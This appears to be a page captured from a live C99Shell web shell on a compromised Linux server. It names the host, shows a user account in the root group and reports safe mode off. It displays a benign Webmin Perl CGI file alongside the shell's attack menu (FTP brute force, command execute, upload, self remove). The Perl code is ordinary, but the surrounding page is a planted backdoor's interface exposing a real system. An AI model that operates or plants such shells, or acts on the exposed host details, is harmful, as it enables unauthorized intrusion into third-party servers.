!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 28.57 GB of 117.98 GB (24.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     edit_newfields.cgi (1.25 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Display all custom fields for domains

require './virtual-server-lib.pl';
&can_edit_templates() || &error($text{'newfields_ecannot'});
&ui_print_header(undef, $text{'newfields_title'}, "", "custom_fields");

print "$text{'newfields_descr'}<p>\n";

# Make the table data
@fields = &list_custom_fields();
$i = 0;
@table = ( );
foreach $f (@fields, { }, { }) {
    push(@table, [
        &ui_textbox("name_$i", $f->{'name'}, 15),
        &ui_textbox("desc_$i", $f->{'desc'}, 45),
        &ui_select("type_$i", $f->{'type'},
               [ map { [ $_, $text{'newfields_type'.$_} ] }
                 (0, 1, 2, 3, 4, 5, 6, 7, 11, 8, 9, 10) ]).
        &ui_textbox("opts_$i", $f->{'opts'}, 25),
        &ui_checkbox("show_$i", 1, $text{'newfields_show2'},
                 $f->{'show'}),
            &ui_select("visible_$i", int($f->{'visible'}),
                [ [ 0, $text{'newfields_visible0'} ],
                  [ 1, $text{'newfields_visible1'} ],
                  [ 2, $text{'newfields_visible2'} ] ]),
        ]);
    $i++;    
    }

# Render it
print &ui_form_columns_table(
    "save_newfields.cgi",
    [ [ "save", $text{'save'} ] ],
    0,
    undef,
    undef,
    [ $text{'newfields_name'}, $text{'newfields_desc'},
      $text{'newfields_type'}, $text{'newfields_show'},
      $text{'newfields_visible'}, ],
    100,
    \@table,
    undef,
    1);

&ui_print_footer("", $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--